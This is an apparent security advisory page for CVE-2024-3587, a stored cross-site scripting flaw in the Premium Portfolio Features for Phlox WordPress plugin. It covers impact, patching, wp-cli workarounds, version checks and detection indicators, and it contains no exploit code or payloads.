CVE-2024-3587
📋 TL;DR
This vulnerability allows authenticated WordPress users with contributor-level access or higher to inject malicious scripts into pages using the Premium Portfolio Features for Phlox theme plugin. The stored XSS executes when other users view the compromised pages, potentially leading to session hijacking, defacement, or malware distribution. All WordPress sites using this plugin up to version 2.3.2 are affected.
💻 Affected Systems
- Premium Portfolio Features for Phlox (auxin-portfolio) WordPress plugin
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator credentials, install backdoors, redirect users to malicious sites, or completely compromise the WordPress site and potentially the underlying server.
Likely Case
Session hijacking, defacement of website pages, or injection of cryptocurrency miners or adware scripts affecting visitors.
If Mitigated
Limited to defacement of specific portfolio pages with minimal data exposure if proper content security policies and user role restrictions are in place.
🎯 Exploit Status
Exploitation requires contributor-level access but is straightforward once authenticated. Public proof-of-concept exists in vulnerability reports.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2.3.3 or later
Vendor Advisory: https://plugins.trac.wordpress.org/changeset/3115537/auxin-portfolio/trunk/public/templates/elements/recent-portfolio.php
Restart Required: No
Instructions:
1. Log into WordPress admin panel. 2. Navigate to Plugins > Installed Plugins. 3. Find 'Premium Portfolio Features for Phlox' plugin. 4. Click 'Update Now' if update is available. 5. Alternatively, download version 2.3.3+ from WordPress repository and replace plugin files.
🔧 Temporary Workarounds
Disable vulnerable plugin
allTemporarily deactivate the auxin-portfolio plugin until patched
wp plugin deactivate auxin-portfolio
Restrict user roles
allRemove contributor and author roles from untrusted users
wp user remove-role <username> contributor
wp user remove-role <username> author
🧯 If You Can't Patch
- Implement Content Security Policy (CSP) headers to restrict script execution
- Install web application firewall (WAF) with XSS protection rules
🔍 How to Verify
Check if Vulnerable:
Check plugin version in WordPress admin under Plugins > Installed Plugins. If version is 2.3.2 or lower, you are vulnerable.Check Version:
wp plugin get auxin-portfolio --field=versionVerify Fix Applied:
Verify plugin version is 2.3.3 or higher. Test portfolio widget functionality to ensure it still works properly.📡 Detection & Monitoring
Log Indicators:
- Unusual portfolio widget modifications by contributor-level users
- Multiple failed XSS attempts in web server logs
Network Indicators:
- Unexpected script tags in portfolio page responses
- External script loads from portfolio pages
SIEM Query:
source="wordpress.log" AND "auxin-portfolio" AND ("update" OR "edit" OR "save") AND user_role="contributor"🔗 References
- https://plugins.trac.wordpress.org/browser/auxin-portfolio/tags/2.3.2/public/templates/elements/recent-portfolio.php#L179
- https://plugins.trac.wordpress.org/changeset/3115537/auxin-portfolio/trunk/public/templates/elements/recent-portfolio.php
- https://www.wordfence.com/threat-intel/vulnerabilities/id/b0ea041b-f09d-4c62-aada-26afbc60b6f2?source=cve
- https://plugins.trac.wordpress.org/browser/auxin-portfolio/tags/2.3.2/public/templates/elements/recent-portfolio.php#L179
- https://plugins.trac.wordpress.org/changeset/3115537/auxin-portfolio/trunk/public/templates/elements/recent-portfolio.php
- https://www.wordfence.com/threat-intel/vulnerabilities/id/b0ea041b-f09d-4c62-aada-26afbc60b6f2?source=cve
